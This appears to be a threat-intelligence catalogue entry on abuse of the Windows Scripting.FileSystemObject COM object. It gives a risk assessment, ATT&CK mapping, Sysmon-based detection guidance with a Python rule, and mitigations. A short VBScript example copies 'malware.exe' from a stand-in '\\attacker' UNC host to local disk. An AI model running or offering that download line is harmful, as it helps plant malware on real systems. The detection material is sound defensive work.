Scripting.FileSystemObject COM Object

⚠️ High Risk | 📁 Windows Com Api | 🏷️ file operations | ✅ Verified
#windows-com-api #file-operations #script

🔧 API Details

Namespace

Scripting.FileSystemObject

Language

VBScript/JavaScript

📊 Risk Assessment

Severity

High

Prevalence

widespread

Ease of Abuse

easy

Likelihood in Real Attacks

80%

🎯 MITRE ATT&CK Techniques

Abuse Scenarios

Malware distribution via script

Technique: T1566.001

🚨 Common in Campaigns

Download and write malware files to disk

Code Example:

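' Instantiate the FileSystemObject COM object
Set fso = CreateObject("Scripting.FileSystemObject")
' Copy a file from a remote UNC path to local disk; True overwrites an existing file
fso.CopyFile "\\attacker\malware.exe", "C:\malware.exe", True

Detection Difficulty: Easy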

🔍 Detection Strategies

Sysmon

HIGH Effectiveness

Monitor file creation from script engines

File Integrity Monitoring

HIGH Effectiveness

Detect unauthorized file creation/modification
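
The Sysmon strategy above, sketched as an added example (not part of the original entry): it flags Sysmon FileCreate events (Event ID 11) where a script engine writes an executable-type file. The engine and extension watch lists, the helper names and the sample events are assumptions constructed for illustration.

```python
import ntpath
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
# Assumed watch lists; tune both for your environment.
SCRIPT_ENGINES = {"wscript.exe", "cscript.exe", "mshta.exe"}
EXECUTABLE_EXTS = {".exe", ".dll", ".scr", ".js", ".vbs", ".hta", ".ps1", ".bat"}

def parse_event(xml_text):
    """Return (event_id, {field: value}) for one Sysmon event rendered as XML."""
    root = ET.fromstring(xml_text)
    event_id = int(root.findtext("e:System/e:EventID", namespaces=NS))
    data = {d.get("Name"): (d.text or "")
            for d in root.iterfind("e:EventData/e:Data", NS)}
    return event_id, data

def is_suspicious(xml_text):
    """True for a FileCreate (ID 11) of an executable type by a script engine."""
    event_id, data = parse_event(xml_text)
    if event_id != 11:
        return False
    # ntpath parses Windows paths correctly on any analysis host OS.
    image = ntpath.basename(data.get("Image", "")).lower()
    ext = ntpath.splitext(data.get("TargetFilename", ""))[1].lower()
    return image in SCRIPT_ENGINES and ext in EXECUTABLE_EXTS

def make_event(event_id, image, target):
    """Build a minimal constructed event carrying only the fields used here."""
    return (
        f'<Event xmlns="{NS["e"]}"><System><EventID>{event_id}</EventID></System>'
        f'<EventData><Data Name="Image">{image}</Data>'
        f'<Data Name="TargetFilename">{target}</Data></EventData></Event>'
    )

# Constructed sample events (not real telemetry).
SAMPLES = [
    make_event(11, r"C:\Windows\System32\wscript.exe", r"C:\malware.exe"),
    make_event(11, r"C:\Windows\System32\cscript.exe", r"C:\Temp\report.log"),
    make_event(11, r"C:\Windows\explorer.exe", r"C:\Users\alice\setup.exe"),
    make_event(23, r"C:\Windows\System32\wscript.exe", r"C:\malware.exe"),
]

def scan(events):
    """Return the TargetFilename of every event that matches the rule."""
    return [parse_event(e)[1]["TargetFilename"] for e in events if is_suspicious(e)]

if __name__ == "__main__":
    for path in scan(SAMPLES):
        print("ALERT: script engine wrote", path)
```

Sysmon only records FileCreate events that its configuration includes, so the FileCreate rules must cover the script engine images for this check to see anything.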

🛡️ Mitigation Strategies

policy

HIGH Feasibility

Disable Windows Script Host and VBScript

🕵️ Threat Intelligence

👥 APT Groups / Threat Actors

APT1

Lazarus

🦠 Malware Families

Emotet

IcedID

🔨 Tools

Custom scripts

📋 Metadata

API ID

93bb263d-30ea-43a7-b9bd-a3ca9744bd9a

Created

2026-02-02

Author

Claw